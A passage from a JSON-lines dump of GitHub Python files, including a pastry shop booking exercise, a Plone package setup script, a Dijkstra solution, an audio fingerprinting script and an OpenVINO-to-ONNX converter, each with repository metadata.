PrivateBooth\nfrom project.delicacies.delicacy import Delicacy\nfrom project.delicacies.gingerbread import Gingerbread\nfrom project.delicacies.stolen import Stolen\n\n\nclass ChristmasPastryShopApp:\n Valid_delicacies = {\n \"Gingerbread\": Gingerbread,\n \"Stolen\": Stolen,\n }\n\n Valid_booths = {\n \"Open Booth\": OpenBooth,\n \"Private Booth\": PrivateBooth, }\n\n def __init__(self):\n self.booths: list[Booth] = []\n self.delicacies: list[Delicacy] = []\n self.income = 0\n\n def add_delicacy(self, type_delicacy: str, name: str, price: float) -> str:\n # • If a delicacy with that name exists, raise an Exception with the following message:\n # \"{delicacy name} already exists!\"\n # • If the delicacy type is not valid, raise an Exception with the following message:\n # \"{type of delicacy} is not on our delicacy menu!\"\n # • Otherwise, create the delicacy, add it to the delicacies' list, and return the following message:\n # \"Added delicacy {delicacy name} - {type of delicacy} to the pastry shop.\"\n # • Valid types of delicacies are: \"Gingerbread\" and \"Stolen\"\n\n delicacy = [d for d in self.delicacies if d.name == name]\n\n if delicacy:\n raise Exception(f\"{name} already exists!\")\n\n if type_delicacy not in self.Valid_delicacies:\n raise Exception(f\"{type_delicacy} is not on our delicacy menu!\")\n\n delicacy = self.Valid_delicacies[type_delicacy](name, price) # creates an instance of the delicacy\n self.delicacies.append(delicacy)\n return f\"Added delicacy {name} - {type_delicacy} to the pastry shop.\"\n\n def add_booth(self, type_booth: str, booth_number: int, capacity: int) -> str:\n # The method creates a booth of the given type and adds it to the booths' collection.\n # All booth numbers should be unique.\n # • If a booth with that number exists, raise an Exception with the following message:\n # \"Booth number {booth number} already exists!\"\n # • If the booth type is not valid, raise an Exception with the following message:\n # \"{type of booth} is not a valid booth!\"\n # • Otherwise, create the booth, add it to the booths' list and return the following message:\n # \"Added booth number {booth number} in the pastry shop.\"\n # • Valid types of delicacies are: \"Open Booth\" and \"Private Booth\"\n\n booth = [b for b in self.booths if b.booth_number == booth_number]\n\n if booth:\n raise Exception(f\"Booth number {booth_number} already exists!\")\n\n if type_booth not in self.Valid_booths:\n raise Exception(f\"{type_booth} is not a valid booth!\")\n\n booth = self.Valid_booths[type_booth](booth_number, capacity) # creates an instance of the booth\n self.booths.append(booth)\n\n return f\"Added booth number {booth_number} in the pastry shop.\"\n\n def reserve_booth(self, number_of_people: int) -> str:\n # Finds the first booth that is not reserved and whose capacity is enough for the number of people\n # provided.\n # • If there is no such booth, raise an Exception with the following message:\n # \"No available booth for {number of people} people!\"\n # • Otherwise, reserves the booth and return:\n # \"Booth {booth number} has been reserved for {number of people} people.\"\n\n try:\n booth = next(filter(lambda b: b.capacity >= number_of_people and not b.is_reserved, self.booths))\n\n except StopIteration:\n raise Exception(f\"No available booth for {number_of_people} people!\")\n\n booth.reserve(number_of_people)\n\n return f\"Booth {booth.booth_number} has been reserved for {number_of_people} people.\"\n\n def order_delicacy(self, booth_number: int, delicacy_name: str) -> str:\n # Finds the booth with the provided number and the delicacy with the provided name;\n # and orders the delicacy for that booth.\n # • If there is no such booth, raise an Exception with the following message:\n # \"Could not find booth {booth number}!\"\n # • If there is no such delicacy, raise an Exception with the following message:\n # \"No {delicacy name} in the pastry shop!\"\n # • Otherwise, order the delicacy for that booth and return:\n # \"Booth {booth number} ordered {delicacy name}.\"\n\n try:\n booth = next(filter(lambda b: b.booth_number == booth_number, self.booths))\n\n except StopIteration:\n raise Exception(\"Could not find booth {booth number}!\")\n\n try:\n delicacy = next(filter(lambda d: d.name == delicacy_name, self.delicacies))\n\n except StopIteration:\n raise Exception(f\"No {delicacy_name} in the pastry shop!\")\n\n booth.delicacy_orders.append(delicacy)\n\n return f\"Booth {booth_number} ordered {delicacy_name}.\"\n\n def leave_booth(self, booth_number: int) -> str:\n # • Finds the booth with the same booth's number (the booth's number will always be valid).\n # • Calculates the bill for that booth taking the price for reservation and all the price of\n # all orders. The bill is added to the pastry shop's total income.\n # • Removes all the ordered delicacies, frees the booth, and sets the price for reservation to 0.\n # • Finally returns:\n # \"Booth {booth number}:\"\n # \"Bill: {bill - formatted to the second decimal}lv.\"\n\n booth = next(filter(lambda b: b.booth_number == booth_number, self.booths))\n\n bill = booth.price_for_reservation + sum(d.price for d in booth.delicacy_orders)\n\n booth.delicacy_orders.clear()\n booth.is_reserved = False\n booth.price_for_reservation = 0\n\n self.income += bill\n\n return f\"Booth {booth_number}:\\n\"\\\n f\"Bill: {bill:.2f}lv.\"\n\n def get_income(self) -> str:\n # • Returns the total income for the pastry shop for all completed bills in the format:\n # \"Income: {income - formatted to the second decimal place}lv.\"\n\n return f\"Income: {self.income:.2f}lv.\"\n\n","repo_name":"h-dmt/Python_Advanced","sub_path":"OOP_exam_prep/Exam-Preparation_1_OK/01.Christmas-Pastry-Shop-Structure-Skeleton/project/christmas_pastry_shop_app.py","file_name":"christmas_pastry_shop_app.py","file_ext":"py","file_size_in_byte":6330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34922523499","text":"# -*- coding: utf-8 -*-\nfrom setuptools import find_packages\nfrom setuptools import setup\n\nversion = '1.0b2.dev0'\ndescription = '.gov.br: Tradução de Português para Libras'\nlong_description = (\n open('README.rst').read() + '\\n' +\n open('CONTRIBUTORS.rst').read() + '\\n' +\n open('CHANGES.rst').read()\n)\n\nsetup(\n name='brasil.gov.vlibrasnews',\n version=version,\n description=description,\n long_description=long_description,\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Framework :: Plone',\n 'Framework :: Plone :: 4.3',\n 'Framework :: Plone :: 5.0',\n 'Framework :: Plone :: 5.1',\n 'Intended Audience :: System Administrators',\n 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n keywords='',\n author='Simples Consultoria',\n author_email='produtos@simplesconsultoria.com.br',\n url='https://github.com/plonegovbr/brasil.gov.vlibrasnews',\n packages=find_packages('src'),\n package_dir={'': 'src'},\n namespace_packages=['brasil', 'brasil.gov'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'plone.api',\n 'plone.app.layout',\n 'plone.app.registry',\n 'plone.autoform',\n 'plone.behavior',\n 'plone.dexterity',\n 'plone.memoize',\n 'plone.supermodel',\n 'Products.CMFPlone >=4.3',\n 'Products.GenericSetup',\n 'requests',\n 'setuptools',\n 'zope.component',\n 'zope.i18nmessageid',\n 'zope.interface',\n 'zope.schema',\n ],\n extras_require={\n 'test': [\n 'AccessControl',\n 'httmock',\n 'mock',\n 'plone.app.contenttypes',\n 'plone.app.robotframework',\n 'plone.app.testing [robot]',\n 'plone.app.textfield',\n 'plone.browserlayer',\n 'plone.registry',\n 'plone.testing',\n 'robotsuite',\n 'zope.component',\n ],\n },\n entry_points=\"\"\"\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n)\n","repo_name":"plonegovbr/brasil.gov.vlibrasnews","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8102612868","text":"# -*- coding: utf-8 -*-\nimport random\n\nclass Role(object):\n def __init__(self, name, description, maximum=1):\n self.name = name\n self.description = description\n self.maximum = maximum\n\n def __str__(self):\n return self.name\n\n\nclass Board(object):\n # name = 'BoardGame'\n # roles = []\n def __init__(self, role_config={}):\n self.role_config = role_config\n self.role_index = {}\n for role in self.roles:\n self.role_index[role.name] = role\n\n def set_role_config(self, role_config):\n self.role_config = role_config\n\n def get_description(self, role_name):\n if role_name in self.role_index:\n return self.role_index[role_name].description\n else:\n return ''\n\n def get_maximum(self, role_name):\n if role_name in self.role_index:\n return self.role_index[role_name].maximum\n else:\n return 0\n\n def deal(self):\n res = []\n for key, value in self.role_config.items():\n if key in self.role_index:\n role_name = key\n else: \n role_name = 'Unknown'\n for i in range(value):\n res.append(role_name)\n random.seed()\n random.shuffle(res)\n return res\n\n def __str__(self):\n return self.name\n\n","repo_name":"knight19861986/SDM","sub_path":"GameAssistant/gameboards/boards.py","file_name":"boards.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18083720492","text":"import traceback\n\nfrom discord.ext import commands\n\nfrom main import AmongUs\nfrom utils import is_playing, NotPlaying, NoGamesExist\nfrom utils.utils import get_game, end_game\n\n\nclass EndGame(commands.Cog):\n def __init__(self, bot):\n self.bot: AmongUs = bot\n\n @commands.command(name=\"endgame\", aliases=[\"end\"])\n @is_playing()\n async def end_game(self, ctx):\n game = await get_game(self.bot.games, ctx)\n await end_game(game)\n self.bot.games.remove(game)\n await ctx.send(f\"The game has ended in channel **{game.channel.name}**\")\n\n @end_game.error\n async def end_game_error(self, ctx, error):\n if isinstance(error, (NotPlaying, NoGamesExist)):\n return await ctx.send(error)\n\n traceback.print_exc()\n \n\ndef setup(bot):\n bot.add_cog(EndGame(bot))\n","repo_name":"rowan-smith/AmongUsMute","sub_path":"cogs/end_game_cog.py","file_name":"end_game_cog.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6479240814","text":"from HOMOGENIZE.FracPlot import FracPlot\nfrom HOMOGENIZE import common\nimport os\nimport sys\n\ndef main():\n os.system('cls')\n \n clargs = sys.argv\n if len(clargs) >= 2:\n fileName = clargs[1]\n \n P = FracPlot('blockModel', fileName=fileName, showPlots=False, colorBar=False)\n P.setAxis_Zoom() \n P.plotBlocks()\n P.removeAxes()\n P.lastFrame()\n P.removeAxes()\n P.saveFigure()\nif __name__ == '__main__':\n main()\n","repo_name":"yetisir/up-frac","sub_path":"blockPlot.py","file_name":"blockPlot.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72176919913","text":"import heapq\r\n\r\ndef solve(start_node, li, N, road):\r\n dist = [500001]*(N+1)\r\n dist[start_node] = 0\r\n pq = []\r\n heapq.heappush(pq, [0, start_node])\r\n while pq:\r\n current_dist, current_node = heapq.heappop(pq)\r\n for next_node, weight in li[current_node].items():\r\n next_dist = dist[current_node] + weight\r\n if next_dist < dist[next_node]:\r\n dist[next_node] = next_dist\r\n heapq.heappush(pq, [next_dist, next_node])\r\n return dist\r\n\r\ndef solution(N, road, K):\r\n answer = 0\r\n li = [dict() for _ in range(N+1)]\r\n for i in range(len(road)):\r\n if road[i][1] in li[road[i][0]]:\r\n li[road[i][0]][road[i][1]] = min(li[road[i][0]][road[i][1]], road[i][2])\r\n else:\r\n li[road[i][0]][road[i][1]] = road[i][2]\r\n if road[i][0] in li[road[i][1]]:\r\n li[road[i][1]][road[i][0]] = min(li[road[i][1]][road[i][0]], road[i][2])\r\n else:\r\n li[road[i][1]][road[i][0]] = road[i][2]\r\n for v in solve(1, li, N, road):\r\n if v <= K:\r\n answer += 1\r\n return answer","repo_name":"khw5123/Algorithm","sub_path":"Programmers/배달.py","file_name":"배달.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22308212345","text":"import json\nimport os\nimport sys\nimport argparse\n\nproject_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.insert(0, project_path)\n\nfrom torch.utils.data import DataLoader, Dataset\nimport torch.nn as nn\nimport numpy as np\nimport librosa\nfrom tqdm import tqdm\nimport torch\n\nfrom utils.utils import crawl_directory, extract_mel_spectrogram\nfrom models.neural_fingerprinter import Neural_Fingerprinter\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', required=True, help='The configuration json file.')\n \n return parser.parse_args()\n\nclass FileDataset(Dataset):\n\n def __init__(self, file, sr, hop_size):\n self.y, self.F = librosa.load(file, sr=sr)\n self.H = hop_size\n self.dur = self.y.size // self.F\n\n # Extract spectrograms\n self._get_spectrograms()\n\n def __len__(self):\n return len(self.spectrograms)\n\n def __getitem__(self, idx):\n return torch.from_numpy(self.spectrograms[idx])\n\n def _get_spectrograms(self):\n self.spectrograms = []\n J = int(np.floor((self.y.size - self.F) / self.H)) + 1\n for j in range(J):\n S = extract_mel_spectrogram(signal=self.y[j * self.H:j * self.H + self.F])\n self.spectrograms.append(S.reshape(1, *S.shape))\n\n\nif __name__ == '__main__':\n\n # parse args\n args = parse_args()\n config_file = args.config\n with open(config_file, \"r\") as f:\n args = json.load(f)\n print(f'Config:\\n{args}\\n')\n\n SR = args[\"SR\"]\n HOP_SIZE = args[\"HOP SIZE\"]\n input_dirs = [os.path.join(project_path, dir) for dir in args[\"input dirs\"]]\n output_dir = os.path.join(project_path, args[\"output dir\"])\n batch_size = args[\"batch size\"]\n pt_file = args[\"weights\"]\n attention = args['attention']\n\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n model = Neural_Fingerprinter(attention=attention).to(device)\n model.load_state_dict(torch.load(pt_file))\n print(f'Running on {device}')\n \n # Check if dir exists\n if not os.path.isdir(output_dir):\n raise FileNotFoundError(f\"dir {output_dir} does not exist, please create it and rerun\")\n\n all_songs = []\n for dir in input_dirs:\n all_songs += crawl_directory(dir, extension='wav')\n print(f'All songs: {len(all_songs)}')\n\n # Discard already fingerprinted songs\n to_discard = [os.path.basename(song).removesuffix('.npy') + '.wav' for song in crawl_directory(output_dir)]\n all_songs = [song for song in all_songs if os.path.basename(song) not in to_discard]\n print(f'Songs to fingerprint: {len(all_songs)} | Discarded: {len(to_discard)}')\n\n model.eval()\n fails = 0\n totals = len(all_songs)\n p_bar = tqdm(all_songs, desc='Extracting deep audio fingerprints', total=totals)\n with torch.no_grad():\n for file in p_bar:\n file_dset = FileDataset(file=file, sr=SR, hop_size=HOP_SIZE)\n if file_dset.dur < 1:\n print(f'Song: {os.path.basename(file)} has duration less than 1 sec. Skipping...')\n fails += 1\n continue\n file_dloader = DataLoader(file_dset, batch_size=batch_size, shuffle=False)\n fingerprints = []\n\n for X in file_dloader:\n X = model(X.to(device))\n fingerprints.append(X.cpu().numpy())\n try:\n fingerprints = np.vstack(fingerprints)\n np.save(\n file=os.path.join(output_dir,\n os.path.basename(file).removesuffix('.wav') + '.npy'),\n arr=fingerprints\n )\n except Exception as e:\n print(f'Failed to save {os.path.basename(file)} | Error: {e}')\n fails += 1\n continue\n\n print(f'Totals: {totals}\\nFails: {fails}')\n","repo_name":"ChrisNick92/deep-audio-fingerprinting","sub_path":"generation/generate_fingerprints.py","file_name":"generate_fingerprints.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"15242876059","text":"#!/usr/bin/env python\n\nFILE_NAME_BASE = 'B-large'\nNUM_PROCESSES = 4\nMEM_LIMIT_GB = 1.5 # per worker process\nRECURSION_LIMIT = 1000\n\nfrom collections import defaultdict\nfrom itertools import product\n\ndef parse(inp):\n\tnumKeys, targetLen, typeLen = (int(x) for x in inp.readline().split())\n\tkeys = inp.readline().strip()\n\tassert len(keys) == numKeys\n\ttarget = inp.readline().strip()\n\tassert len(target) == targetLen\n\treturn keys, target, typeLen\n\ndef maxPrefix(s):\n\treturn reduce(max, (i for i in xrange(1, len(s)) if s[:i] == s[-i:]), 0)\n\ndef solve(keys, target, typeLen):\n\tif set(target) - set(keys):\n\t\treturn 0.0\n\n\tassert len(target) <= typeLen\n\tmp = maxPrefix(target)\n\tmaxBananas = 1 + (typeLen - len(target)) / (len(target) - mp)\n\n\tif False:\n\t\tmatches = 0\n\t\tfor typed in product(keys, repeat=typeLen):\n\t\t\tword = ''.join(typed)\n\t\t\ti = 0\n\t\t\twhile True:\n\t\t\t\ti = word.find(target, i)\n\t\t\t\tif i == -1:\n\t\t\t\t\tbreak\n\t\t\t\tmatches += 1\n\t\t\t\ti += 1\n\t\tslowMatches = matches\n\n\tkeyHist = defaultdict(int)\n\tfor key in keys:\n\t\tkeyHist[key] += 1\n\ttrans = []\n\tfor i in xrange(len(target)):\n\t\tnxt = []\n\t\tpref = maxPrefix(target[:i])\n\t\tfor key, chance in keyHist.iteritems():\n\t\t\tfull = False\n\t\t\tif key == target[i]:\n\t\t\t\tsucc = i + 1\n\t\t\t\tif succ == len(target):\n\t\t\t\t\tfull = True\n\t\t\t\t\tsucc = mp\n\t\t\telif key == target[pref]:\n\t\t\t\tsucc = pref + 1\n\t\t\telse:\n\t\t\t\tsucc = 0\n\t\t\tnxt.append([succ, full, chance])\n\t\ttrans.append(nxt)\n\tprogress = [[1] + [0] * (len(target) - 1)]\n\tfor rep in xrange(typeLen):\n\t\tnewProgress = [[0] * len(target)]\n\t\tfor j, pj in enumerate(progress):\n\t\t\tfor i, p in enumerate(pj):\n\t\t\t\tfor succ, full, chance in trans[i]:\n\t\t\t\t\tif j + full >= len(newProgress):\n\t\t\t\t\t\tnewProgress.append([0] * len(target))\n\t\t\t\t\tnewProgress[j + full][succ] += p * chance\n\t\tprogress = newProgress\n\tmatches = 0\n\tfor j, pj in enumerate(progress):\n\t\tmatches += j * sum(pj)\n\t#assert matches == slowMatches, (matches, slowMatches)\n\n\twords = len(keys) ** typeLen\n\treturn maxBananas - float(matches) / float(words)\n\ndef main():\n\timport sys\n\tsys.setrecursionlimit(RECURSION_LIMIT)\n\n\timport resource\n\tsoft, hard = resource.getrlimit(resource.RLIMIT_AS)\n\tresource.setrlimit(resource.RLIMIT_AS, (MEM_LIMIT_GB * 1024 ** 3, hard))\n\n\twith open(FILE_NAME_BASE + '.in', 'r') as inp:\n\t\tnumCases = int(inp.readline())\n\t\tinputs = [parse(inp) for _ in xrange(numCases)]\n\n\tif NUM_PROCESSES == 0:\n\t\trunners = [lambda inp=inp: apply(solve, inp) for inp in inputs]\n\telse:\n\t\tfrom multiprocessing import Pool\n\t\tfrom signal import SIGINT, SIG_IGN, signal\n\t\tpool = Pool(NUM_PROCESSES, signal, (SIGINT, SIG_IGN))\n\t\trunners = [pool.apply_async(solve, inp).get for inp in inputs]\n\t\tpool.close()\n\n\tcaseFmt = '%' + str(len(str(numCases))) + 'd'\n\tprogressFmt = '[%s/%s] %%s\\n' % (caseFmt, caseFmt)\n\twith open(FILE_NAME_BASE + '.out', 'w') as out:\n\t\tfor case, runner in enumerate(runners, 1):\n\t\t\tresult = runner()\n\t\t\tout.write('Case #%d: %s\\n' % (case, result))\n\t\t\tout.flush()\n\t\t\tsys.stderr.write(progressFmt % (case, numCases, result))\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/15/32/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"10924285494","text":"import pytest\nfrom game import Game\nfrom board import Board\n\n@pytest.fixture\ndef game():\n return Game()\n\ndef test_game_is_draw(game):\n # Test an empty board (not a draw)\n game.board = Board()\n assert game.is_draw() == False\n\n # Test a board with a win (not a draw)\n game.board.grid = [\n ['X', 'O', 'X'],\n ['X', 'O', 'O'],\n ['O', 'O', 'X'] # Change this line to have a win\n ]\n assert game.is_draw() == False\n\n # Test a full board with no win (a draw)\n game.board.grid = [\n ['X', 'O', 'X'],\n ['O', 'O', 'X'],\n ['X', 'X', 'O']\n ]\n assert game.is_draw() == True\n","repo_name":"PFound/GPT4_TicTacToe","sub_path":"test/test_game.py","file_name":"test_game.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10404408205","text":"\r\nclass PositionCalculator:\r\n\r\n\tdef __init__(self):\r\n\t\tself.__width = 0\r\n\t\tself.__height = 0\r\n\t\tself.__margin = 0\r\n\t\tself.__padding = 0\r\n\t\tself.__chessmanSpacing = 0\r\n\t\tself.__boundarySpacing = 0\r\n\r\n\tdef outlinePos(self):\r\n\t\toutlineSize = self.outlineSize()\r\n\t\textraWidth = self.__width - outlineSize[0]\r\n\t\textraHeight = self.__height - outlineSize[1]\r\n\t\treturn (extraWidth // 2 , extraHeight // 2)\r\n\r\n\tdef borderPos(self):\r\n\t\tretX, retY = self.outlinePos()\r\n\t\tretX += self.__padding\r\n\t\tretY += self.__padding\r\n\t\treturn (retX, retY)\r\n\r\n\tdef positionAtScreen(self, x, y):\r\n\t\tretX, retY = self.borderPos()\r\n\t\tcellSize = self.chessmanSize() + self.__chessmanSpacing\r\n\t\tretX += cellSize * x\r\n\t\tretY += cellSize * y\r\n\t\tif y > 4:\r\n\t\t\tretY += self.__boundarySpacing\r\n\t\treturn (retX, retY)\r\n\r\n\tdef positionAtBoard(self, x, y):\r\n\t\toriginX, originY = self.borderPos()\r\n\t\tx -= originX\r\n\t\ty -= originY\r\n\t\tchessmanSize = self.chessmanSize()\r\n\t\tradius = chessmanSize//2\r\n\t\tcellSize = chessmanSize + self.__chessmanSpacing\r\n\t\tx += radius\r\n\t\ty += radius\r\n\t\tif x < 0 or y < 0:\r\n\t\t\treturn\r\n\t\tif y > 5*cellSize+self.__boundarySpacing:\r\n\t\t\ty -= self.__boundarySpacing\r\n\t\telif y >= 5*cellSize:\r\n\t\t\treturn\r\n\t\tretX = x//cellSize\r\n\t\tretY = y//cellSize\r\n\t\tif x-retX*cellSize > chessmanSize or y-retY*cellSize > chessmanSize:\r\n\t\t\treturn\r\n\t\tif retX>8 or retY>9:\r\n\t\t\treturn\r\n\t\treturn (retX, retY)\r\n\r\n\tdef chessmanSize(self):\r\n\t\tmaxWidth = self.__width\r\n\t\tmaxWidth -= 2*self.__margin\r\n\t\tmaxWidth -= 2*self.__padding\r\n\t\tmaxWidth -= 8*self.__chessmanSpacing\r\n\t\tmaxWidth //= 8\r\n\t\tmaxHeight = self.__height\r\n\t\tmaxHeight -= 2*self.__margin\r\n\t\tmaxHeight -= 2*self.__padding\r\n\t\tmaxHeight -= 9*self.__chessmanSpacing\r\n\t\tmaxHeight -= self.__boundarySpacing\r\n\t\tmaxHeight //= 9\r\n\t\treturn min(maxWidth, maxHeight)\r\n\r\n\tdef outlineSize(self):\r\n\t\treturn self.__outlineSize(self.chessmanSize())\r\n\r\n\tdef borderSize(self):\r\n\t\treturn self.__borderSize(self.chessmanSize())\r\n\r\n\tdef boardSize(self):\r\n\t\treturn (self.__width, self.__height)\r\n\r\n\tdef __borderSize(self, chessmanSize):\r\n\t\tretWidth, retHeight = (8*chessmanSize, 9*chessmanSize)\r\n\t\tretWidth += 8*self.__chessmanSpacing\r\n\t\tretHeight += 9*self.__chessmanSpacing\r\n\t\tretHeight += self.__boundarySpacing\r\n\t\treturn (retWidth, retHeight)\r\n\r\n\tdef __outlineSize(self, chessmanSize):\r\n\t\tretWidth, retHeight = self.__borderSize(chessmanSize)\r\n\t\tretWidth += 2*self.__padding\r\n\t\tretHeight += 2*self.__padding\r\n\t\treturn (retWidth, retHeight)\r\n\r\n\tdef boardSizeForFixedChessmanSize(self, chessmanSize):\r\n\t\tretWidth, retHeight = self.__outlineSize(chessmanSize)\r\n\t\tretWidth += 2*self.__margin\r\n\t\tretHeight += 2*self.__margin\r\n\t\treturn (retWidth, retHeight)\r\n\r\n\tdef setMargin(self, margin):\r\n\t\tself.__margin = margin\r\n\r\n\tdef setPadding(self, padding):\r\n\t\tself.__padding = padding\r\n\r\n\tdef setChessboardSize(self, width, height):\r\n\t\tself.__width = width\r\n\t\tself.__height = height\r\n\r\n\tdef setChessmanSpacing(self, spacing):\r\n\t\tself.__chessmanSpacing = spacing\r\n\r\n\t# 楚河汉界的宽度\r\n\tdef setBoundarySpacing(self, boundarySpacing):\r\n\t\tself.__boundarySpacing = boundarySpacing\r\n\r\n\r\n","repo_name":"xiyanggudao/AIChineseChess","sub_path":"gui/PositionCalculator.py","file_name":"PositionCalculator.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29380789848","text":"import argparse\nimport json\nimport numpy as np\nimport glob\nimport os\nimport onnx\nimport onnx.utils\nfrom . import onnx_helper \nfrom onnx import checker, helper\nfrom .onnx_helper import onnx_save_model\nfrom .openvino_parse_xml import parse_openvino_xml\nfrom .onnx_infer import onnx_infer, onnx_activations_batched, onnx_random_infer, onnx_random_input, load_image\nfrom .utils import *\nimport sys\n\n\nnp.set_printoptions(suppress=True, precision=4, linewidth=120)\n\n\ndef trunc(arr, decimals=8):\n return np.trunc(arr*10**decimals)/(10**decimals)\n\n\ndef gather_stats(onnx_model, nodes, folder, count, scale):\n images = []\n extensions = ['*.jpg', '*.png', '*.jpeg']\n extensions += [e.upper() for e in extensions]\n for ext in extensions:\n images += sorted(glob.glob(os.path.join(folder, ext)))\n if count:\n images = images[:count]\n input_shape = onnx_helper.get_model_input_shape(onnx_model)\n\n channels = input_shape[0]\n height = input_shape[1]\n width = input_shape[2]\n input_arrays = np.vstack([load_image(i, scale, channels, height, width) for i in images])\n stats = onnx_activations_batched(onnx_model, input_arrays, stats_only=True)\n\n stats_list = []\n for output in sorted(stats.keys()):\n stats_list.append({'id':output,\n 'mean': stats[output]['mean'],\n 'max': stats[output]['max'],\n 'min': stats[output]['min']})\n\n if not (nodes is None):\n for node in nodes:\n node.set_stats_by_id(stats_list)\n return nodes\n else:\n return stats_list\n\n\ndef as_int(x):\n values = [int(_) for _ in x.split(',')]\n\n if len(values) == 1:\n return values[0]\n else:\n return values\n\n\ndef io(vinode):\n inputs = ['{}'.format(_) for _ in vinode._from]\n if vinode.weights:\n inputs += ['W{}'.format(vinode.id)]\n if vinode.biases:\n inputs += ['b{}'.format(vinode.id)]\n outputs = ['{}'.format(vinode.id)]\n\n return inputs, outputs\n\n\ndef gen_pad_10(vinode, vinodes):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n pads_begin = vinodes[int(inputs[1])]\n pads_end = vinodes[int(inputs[2])]\n inputs = inputs[:1]\n\n pads = pads_begin.data['arr'].tolist() + pads_end.data['arr'].tolist()\n if pads[0] != 0:\n errmsg=\"ERROR: Node {}: pad channels at beginning of buffer not supported\\n\"\n sys.stderr.write(errmsg.format(vinode.name))\n sys.exit(1)\n if vinode.data['pad_mode'] != 'constant':\n errmsg=\"ERROR: Node {}: Only pad mode 'constant' is supported'\"\n sys.stderr.write(errmsg.format(vinode.name))\n sys.exit(1)\n if float(vinode.data['pad_value']) != 0.0:\n errmsg=\"ERROR: Node {}: Only pad value of zero\"\n sys.stderr.write(errmsg.format(vinode.name))\n sys.exit(1)\n\n\n value_tensor = onnx.helper.make_tensor('value_{}'.format(buf),\n onnx.TensorProto.FLOAT,\n (1,),\n [0])\n\n pads_tensor = onnx.helper.make_tensor('pad_{}'.format(vinode.id),\n onnx.TensorProto.INT64,\n np.asarray(pads).shape,\n pads)\n inits.append(pads_tensor)\n inits.append(value_tensor)\n\n inputs.append('pad_{}'.format(vinode.id))\n inputs.append('value_{}'.format(vinode.id))\n\n node = onnx.helper.make_node('Pad',\n inputs=inputs,\n outputs=outputs,\n mode='constant',\n name=str(vinode.id))\n nodes.append(node)\n return nodes, inits\n\n\ndef gen_input(vinode):\n nodes, inits = [], []\n return nodes, inits\n\n\ndef gen_conv(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n pads = as_int(vinode.data['pads_begin']) + as_int(vinode.data['pads_end'])\n\n node = onnx.helper.make_node(\n 'Conv',\n inputs=inputs,\n outputs=outputs,\n group = as_int(vinode.data['group']),\n strides = as_int(vinode.data['strides']),\n dilations = as_int(vinode.data['dilations']),\n kernel_shape = as_int(vinode.data['kernel']),\n pads = pads,\n name = str(vinode.id),\n )\n nodes.append(node)\n\n\n if vinode.weights:\n length = vinode.weights['arr'].shape[0]\n kernel_shape = as_int(vinode.data['kernel'])\n output_channels = as_int(vinode.data['output'])\n\n input_channels = int(length / output_channels / kernel_shape[0] / kernel_shape[1])\n weights_shape = (output_channels, input_channels, kernel_shape[0], kernel_shape[1])\n\n tensor = onnx.helper.make_tensor('W{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n weights_shape,\n trunc(vinode.weights['arr']).tolist(),\n )\n inits.append(tensor)\n if vinode.biases:\n tensor = onnx.helper.make_tensor('b{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (as_int(vinode.data['output']),),\n trunc(vinode.biases['arr']).tolist(),\n )\n inits.append(tensor)\n\n\n return nodes, inits\ndef auto_pad_calc(auto_pad,input_shape,kernel_size,stride,dilations):\n pads=[0 for i in range(4)]\n if auto_pad in (\"SAME_UPPER\",\"SAME_LOWER\"):\n def calc_pad(in_shape,kern,stride):\n out_shape = np.ceil(in_shape/stride)\n pad = (out_shape-1)*stride + kern -in_shape\n return pad\n \n dilated_kernel_size0 = (kernel_size[0]-1)*dilations[0]+1\n dilated_kernel_size1 = (kernel_size[1]-1)*dilations[1]+1\n\n pad = calc_pad(input_shape[2],dilated_kernel_size0,stride[0])\n pads[0] = np.ceil(pad/2)\n pads[2] = np.floor(pad/2)\n \n pad = calc_pad(input_shape[3],dilated_kernel_size1,stride[1])\n pads[1] = np.ceil(pad/2)\n pads[3] = np.floor(pad/2)\n if auto_pad == \"SAME_UPPER\":\n #swap back and front\n pads = pads[2:] + pads[:2]\n return [int(p) for p in pads]\n \n \n\ndef gen_conv_10(vinode, bias_vinode, vinodes):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n node_id = vinode.id\n if bias_vinode:\n bias_inputs, 